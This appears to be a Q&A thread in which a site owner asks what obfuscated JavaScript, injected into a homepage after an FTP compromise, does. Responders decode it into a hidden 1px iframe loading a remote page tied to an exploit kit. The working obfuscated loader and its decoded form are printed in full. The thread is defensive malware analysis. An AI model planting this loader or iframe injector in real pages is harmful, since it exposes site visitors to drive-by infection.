# Malicious javascript injected - What does it do?

Tags: javascript

One of our sites recently had their ftp account compromised and as a result an attacker injected the following javascript into their homepage html. I'm pretty good with javascript but I cant make heads or tails of what this code is actually doing. Anyone else here see whats going on in this?

```
p=parseInt;ss=(123)?String.fromCharCode:0;asgq="28!66!75!6e!63!74!6@!6f!6e!20!28!2@!20!7b!d!a!20!20!20!20!76!61!72!20!66!71!7@!20!3d!20!64!6f!63!75!6d!65!6e!74!2e!63!72!65!61!74!65!45!6c!65!6d!65!6e!74!28!27!6@!66!72!61!6d!65!27!2@!3b!d!a!d!a!20!20!20!20!66!71!7@!2e!73!72!63!20!3d!20!27!68!74!74!70!3a!2f!2f!77!6@!6e!65!6c!6f!76!65!72!67!75!6@!64!65!2e!63!6f!6d!2f!5f!76!74!6@!5f!62!6@!6e!2f!63!6f!75!6e!74!65!72!2e!70!68!70!27!3b!d!a!20!20!20!20!66!71!7@!2e!73!74!7@!6c!65!2e!70!6f!73!6@!74!6@!6f!6e!20!3d!20!27!61!62!73!6f!6c!75!74!65!27!3b!d!a!20!20!20!20!66!71!7@!2e!73!74!7@!6c!65!2e!62!6f!72!64!65!72!20!3d!20!27!30!27!3b!d!a!20!20!20!20!66!71!7@!2e!73!74!7@!6c!65!2e!68!65!6@!67!68!74!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!66!71!7@!2e!73!74!7@!6c!65!2e!77!6@!64!74!68!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!66!71!7@!2e!73!74!7@!6c!65!2e!6c!65!66!74!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!66!71!7@!2e!73!74!7@!6c!65!2e!74!6f!70!20!3d!20!27!31!70!78!27!3b!d!a!d!a!20!20!20!20!6@!66!20!28!21!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!42!7@!4@!64!28!27!66!71!7@!27!2@!2@!20!7b!d!a!20!20!20!20!20!20!20!20!64!6f!63!75!6d!65!6e!74!2e!77!72!6@!74!65!28!27!3c!64!6@!76!20!6@!64!3d!5c!27!66!71!7@!5c!27!3e!3c!2f!64!6@!76!3e!27!2@!3b!d!a!20!20!20!20!20!20!20!20!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!42!7@!4@!64!28!27!66!71!7@!27!2@!2e!61!70!70!65!6e!64!43!68!6@!6c!64!28!66!71!7@!2@!3b!d!a!20!20!20!20!7d!d!a!7d!2@!28!2@!3b".replace(/@/g,"9").split("!");try{document.body&=0.1}catch(gdsgsdg){zz=3;dbshre=12;if(dbshre){vfvwe=0;try{document;}catch(agdsg){vfvwe=1;}if(!vfvwe){e=eval;}s="";if(zz)for(i=0;i-484!=0;i++){if(window.document)s+=ss(p(asgq[i],16));}if(window.document)e(s);}}
```

After changing e(s) to console.log(s) i get the following:

```
(function () {
    var fqy = document.createElement('iframe');

    fqy.src = 'http://wineloverguide.com/_vti_bin/counter.php';
    fqy.style.position = 'absolute';
    fqy.style.border = '0';
    fqy.style.height = '1px';
    fqy.style.width = '1px';
    fqy.style.left = '1px';
    fqy.style.top = '1px';

    if (!document.getElementById('fqy')) {
        document.write('<div id=\'fqy\'></div>');
        document.getElementById('fqy').appendChild(fqy);
    } })();
```

Comment: At one part, I see `e = eval`.  So I suggest changing the `e(s)` at the end to `console.log(s)`.  Doing that shows that it creates an `<iframe>` that loads `http://wineloverguide.com/_vti_bin/counter.php` (I wouldn't try to load that page).

Comment: You sir, are a genius! Now why did you answer in a comment instead of an answer so I could choose it!?

Comment: Also, this might be somehow related to the [Blackhole exploit kit](http://en.wikipedia.org/wiki/Blackhole_exploit_kit) [according to a report](http://urlquery.net/report.php?id=1733469) run on another website that has been affected by something similar.

Comment: The worst thing about people answering in comments is that we cannot downvote them if they are wrong.

Comment: You could use Spidermonkey Javascript interpreter for doings this in command line. see my answer: http://security.stackexchange.com/questions/33664/what-does-this-injected-code-do/33671#33671

Answer (score 2, accepted):

If you look closer at the code, it just has a string of hex digits, that it converts character by character into JavaScript code.

At one point in that code, I see `e=eval`, and then at the end is `e(s)`.  So, if you change `e(s)` to `console.log(s)`, you can see what this code is *really* doing.

```
(function () {
    var fqy = document.createElement('iframe');

    fqy.src = 'http://wineloverguide.com/_vti_bin/counter.php';
    fqy.style.position = 'absolute';
    fqy.style.border = '0';
    fqy.style.height = '1px';
    fqy.style.width = '1px';
    fqy.style.left = '1px';
    fqy.style.top = '1px';

    if (!document.getElementById('fqy')) {
        document.write('<div id=\'fqy\'></div>');
        document.getElementById('fqy').appendChild(fqy);
    }
})();
```

Comment: So in this code it looks like wineloverguide.com was compromised and is now serving black holes for attackers... should I notify them? - scratch that i guess its not a real site anyway...

Comment: @SublymeRick: That's up to you :)

Comment: oh it is a real site, just took forever to come up... lol great hosting... yeah i'll contact them.